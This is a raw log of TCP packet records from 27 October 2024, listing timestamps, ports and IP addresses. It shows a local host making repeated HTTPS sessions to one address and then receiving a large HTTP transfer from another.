Oct 27, 2024 12:13:05.682117939 CET	49706	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:05.682390928 CET	49706	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:05.682401896 CET	443	49706	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:06.295953989 CET	443	49706	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:06.296180010 CET	49706	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:06.318097115 CET	49706	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:06.318135023 CET	443	49706	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:06.319098949 CET	443	49706	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:06.336193085 CET	49706	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:06.336313009 CET	49706	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:06.336368084 CET	443	49706	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:06.897547960 CET	443	49706	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:06.897828102 CET	443	49706	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:06.897860050 CET	49706	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:06.897907972 CET	49706	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:07.007251024 CET	49707	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:07.007302046 CET	443	49707	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:07.007400036 CET	49707	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:07.007667065 CET	49707	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:07.007678032 CET	443	49707	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:07.618314028 CET	443	49707	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:07.618392944 CET	49707	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:07.619683981 CET	49707	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:07.619698048 CET	443	49707	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:07.620778084 CET	443	49707	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:07.622112989 CET	49707	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:07.622278929 CET	49707	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:07.622442961 CET	443	49707	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:07.622520924 CET	49707	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:07.622625113 CET	443	49707	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:08.163490057 CET	443	49707	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:08.163708925 CET	49707	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:08.163727999 CET	443	49707	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:08.163783073 CET	49707	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:08.351227045 CET	49708	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:08.351264954 CET	443	49708	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:08.351347923 CET	49708	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:08.351614952 CET	49708	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:08.351630926 CET	443	49708	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:08.970007896 CET	443	49708	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:08.970372915 CET	49708	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:08.971400023 CET	49708	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:08.971426964 CET	443	49708	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:08.972513914 CET	443	49708	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:08.973663092 CET	49708	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:08.973911047 CET	49708	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:08.973956108 CET	443	49708	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:08.974039078 CET	49708	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:08.974056959 CET	443	49708	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:09.638331890 CET	443	49708	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:09.638622999 CET	443	49708	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:09.638875008 CET	49708	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:09.639245987 CET	49708	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:09.639277935 CET	443	49708	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:10.225919962 CET	49709	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:10.226015091 CET	443	49709	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:10.226267099 CET	49709	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:10.226604939 CET	49709	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:10.226629019 CET	443	49709	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:10.834184885 CET	443	49709	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:10.834290981 CET	49709	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:10.837150097 CET	49709	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:10.837173939 CET	443	49709	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:10.837739944 CET	443	49709	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:10.839461088 CET	49709	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:10.839569092 CET	49709	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:10.839582920 CET	443	49709	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:11.348783016 CET	443	49709	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:11.349036932 CET	443	49709	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:11.349073887 CET	49709	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:11.349098921 CET	49709	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.093780994 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.093825102 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.093945026 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.094357014 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.094373941 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.710321903 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.710794926 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.712702990 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.712719917 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.713613033 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.715735912 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.716801882 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.716839075 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.716994047 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.717027903 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.717401028 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.717436075 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.717693090 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.717719078 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.717987061 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.718014002 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.718456030 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.718482018 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.718489885 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.718508959 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.718767881 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.718797922 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.718821049 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.718943119 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.718971968 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.729017019 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.729212046 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.729269028 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.729275942 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.729310989 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.729311943 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.729386091 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:12.729397058 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:12.729428053 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:14.576900005 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:14.577159882 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:14.577560902 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:14.577560902 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:14.590468884 CET	49711	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:14.590516090 CET	443	49711	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:14.590864897 CET	49711	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:14.591175079 CET	49711	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:14.591187000 CET	443	49711	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:14.877949953 CET	49710	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:14.877990007 CET	443	49710	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:15.218576908 CET	443	49711	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:15.218885899 CET	49711	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:15.220695972 CET	49711	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:15.220716000 CET	443	49711	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:15.221723080 CET	443	49711	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:15.223355055 CET	49711	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:15.223403931 CET	49711	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:15.223534107 CET	443	49711	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:15.913160086 CET	443	49711	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:15.913408995 CET	443	49711	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:15.913539886 CET	49711	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:15.913767099 CET	49711	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:15.913767099 CET	49711	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:15.913803101 CET	443	49711	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:15.913845062 CET	443	49711	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:15.916539907 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:15.922231913 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:15.922565937 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:15.929804087 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:15.935616970 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.838331938 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.838423014 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.838460922 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.838489056 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:16.838584900 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.838620901 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.838637114 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:16.838658094 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.838706017 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:16.838968039 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.839003086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.839037895 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.839052916 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:16.839075089 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.839121103 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:16.844489098 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.893465042 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:16.995171070 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.995214939 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.995239973 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.995259047 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.995279074 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.995384932 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:16.995455980 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.995496035 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.995532036 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.995724916 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:16.995724916 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:16.996028900 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.996082067 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.996119976 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.996157885 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.996342897 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:16.996342897 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:16.996658087 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.996783018 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.996822119 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.996860027 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.996922970 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:16.996923923 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:16.997489929 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.997569084 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.997605085 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.997616053 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:16.997714043 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:16.997761965 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.113497019 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.113516092 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.113531113 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.113576889 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.113583088 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.113631010 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.113723993 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.152427912 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.152482986 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.152544975 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.152581930 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.152611971 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.152659893 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.152681112 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.152698994 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.152704000 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.152717113 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.152734041 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.152754068 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.152770996 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.152879953 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.152895927 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.152937889 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.152937889 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.152937889 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.153172970 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.153224945 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.153327942 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.153342009 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.153342009 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.153378963 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.206181049 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.232570887 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.232621908 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.232642889 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.232676029 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.232693911 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.232712984 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.232983112 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.270982981 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.271028996 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.271068096 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.271104097 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.271138906 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.271174908 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.271209955 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.271248102 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.271353006 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.271353006 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.271353006 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.271522045 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.271553993 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.271593094 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.271626949 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.271667957 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.271667957 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.271667957 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.271694899 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.271806955 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.271842957 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.271857977 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.271938086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.271995068 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.272295952 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.272347927 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.272408962 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.351279020 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.351360083 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.351401091 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.351435900 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.351474047 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.351732969 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.351733923 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.389708996 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.389782906 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.389805079 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.389822006 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.389842033 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.389863014 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.390295982 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.390328884 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.390398979 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.390439987 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.390515089 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.390515089 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.390568972 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.390604973 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.390646935 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.390712976 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.390748978 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.390767097 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.390779018 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.390783072 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.390820980 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.390834093 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.440314054 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.470864058 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.470937014 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.470974922 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.471009970 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.471048117 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.471101046 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.471101046 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.508189917 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.508275986 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.508279085 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.508317947 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.508353949 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.508372068 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.508394003 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.508455992 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.508516073 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.508550882 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.508586884 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.508605957 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.508624077 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.508670092 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.508994102 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.509059906 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.509076118 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.509088039 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.509100914 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.509114981 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.509118080 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.509167910 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.509295940 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.509386063 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.509422064 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.509439945 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.509514093 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.509800911 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.588170052 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.588217020 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.588254929 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.588288069 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.588291883 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.588327885 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.588345051 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.588366032 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.588413000 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.626421928 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.626513958 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.626553059 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.626574039 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.626646996 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.626699924 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.626699924 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.626737118 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.626789093 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.626851082 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.626885891 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.626934052 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.626956940 CET	80	49712	185.215.113.16	192.168.2.5
